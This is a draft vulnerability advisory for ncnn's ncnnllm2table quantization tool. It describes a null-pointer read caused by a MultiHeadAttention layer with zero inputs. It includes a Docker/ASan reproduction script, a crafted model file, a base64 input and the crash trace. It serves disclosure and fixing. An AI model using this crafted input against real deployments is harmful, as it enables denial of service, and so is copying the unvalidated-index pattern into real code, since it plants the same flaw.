All advisories
Draft

Out-of-Bounds Read in LLM Calibration

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Out-of-Bounds Read in LLM Calibration

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: tools/quantize/ncnnllm2table.cpp:1215 in QuantNet::collect_activation_stats
Sanitizer verdict: SEGV on unknown address 0x000000000000 (pc 0x582147b9db65 bp 0x7ffdacca25f0 sp 0x7ffdacca1f90 T0)

Summary

A MultiHeadAttention layer that declares zero input blobs but otherwise passes ncnnllm2table's support check makes the calibration pass dereference mha->bottoms[0] on an empty vector, killing the tool before the quantization table is written. The entry point is the ncnnllm2table CLI, which loads the attacker-supplied .param/.bin pair and enters QuantNet::collect_activation_stats() when AWQ or GPTQ calibration is selected. The demonstrated impact is denial of service.

Detail

resolve_mha_bottom_blob_index() maps a bottom-blob count onto query/key/value/mask/cache indices with a chain of exact-equality tests. Every branch is an if (bottom_blob_count == N) for N in 1..6; there is no else and no rejection path, so a count of 0 leaves all six output indices at the zero the caller initialised them to.

// tools/quantize/ncnnllm2table.cpp:1200
                int q_blob_i = 0;
                int k_blob_i = 0;
                int v_blob_i = 0;
                int attn_mask_i = 0;
                int cached_xk_i = 0;
                int cached_xv_i = 0;
                resolve_mha_bottom_blob_index(mha, (int)mha->bottoms.size(), q_blob_i, k_blob_i, v_blob_i, attn_mask_i, cached_xk_i, cached_xv_i);

// tools/quantize/ncnnllm2table.cpp:1215
                ex.extract(mha->bottoms[q_blob_i], q_blob);

The gate immediately above, is_supported_llm_multiheadattention() at line 1197, is the only filter applied to the layer. It validates embed_dim, num_heads, kdim, vdim, weight_data_size and the element size and width of all eight weight and bias mats (tools/quantize/ncnnllm_quant.h:162-184), but it never looks at mha->bottoms. A layer with a self-consistent weight description and no inputs passes it.

The PoC generator emits MultiHeadAttention mha 0 1 out 0=1 1=1 2=1 3=1 4=1 5=0 6=1 18=0 — zero bottoms on the attention layer — together with a .bin holding the twelve floats those dimensions require. With attn_mask (key 5) and kv_cache (key 7, defaulted) both zero, resolution falls into the branch at line 460, where none of the bottom_blob_count == 1/2/3 tests match a count of 0, so q_blob_i stays 0. std::vector<int>::operator[](0) on the empty bottoms dereferences a null data() pointer, giving the read SEGV on 0x000000000000 reported at line 1215.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-out-of-bounds-read-in-llm-calibration && cd ncnn-poc-out-of-bounds-read-in-llm-calibration

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
2 2
Input i 0 1 i
MultiHeadAttention m 0 1 o 0=1 2=1
EOF

cat > c.list <<'EOF'
c.npy
EOF

base64 -d > c.npy <<'EOF'
k05VTVBZAQBGAHsnZGVzY3InOiAnPGY0JywgJ2ZvcnRyYW5fb3JkZXInOiBGYWxzZSwgJ3NoYXBlJzogKDQsKSwgfSAgICAgICAgICAgIAoAAIA/AACAPwAAgD8AAIA/
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/quantize/ncnnllm2table poc.param null c.list out.table method=awq 'shape=[4]'

AddressSanitizer output:

collect_activation_stats 0.00% [ 0 / 1 ]
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x56e9fd670b65 bp 0x7ffe82d63460 sp 0x7ffe82d62e00 T0)
==1==The signal is caused by a READ memory access.
==1==Hint: address points to the zero page.
    #0 0x56e9fd670b65 in QuantNet::collect_activation_stats() /ncnn/tools/quantize/ncnnllm2table.cpp:1215
    #1 0x56e9fd682803 in main /ncnn/tools/quantize/ncnnllm2table.cpp:1631
    #2 0x7873a6d3c1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #3 0x7873a6d3c28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #4 0x56e9fd607be4 in _start (/ncnn/build/tools/quantize/ncnnllm2table+0x2a4be4) (BuildId: 2d753d31c85347b9ae53e2a17eb245640e9cded5)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /ncnn/tools/quantize/ncnnllm2table.cpp:1215 in QuantNet::collect_activation_stats()
==1==ABORTING

Credit

Zheng Yu @ DepthFirst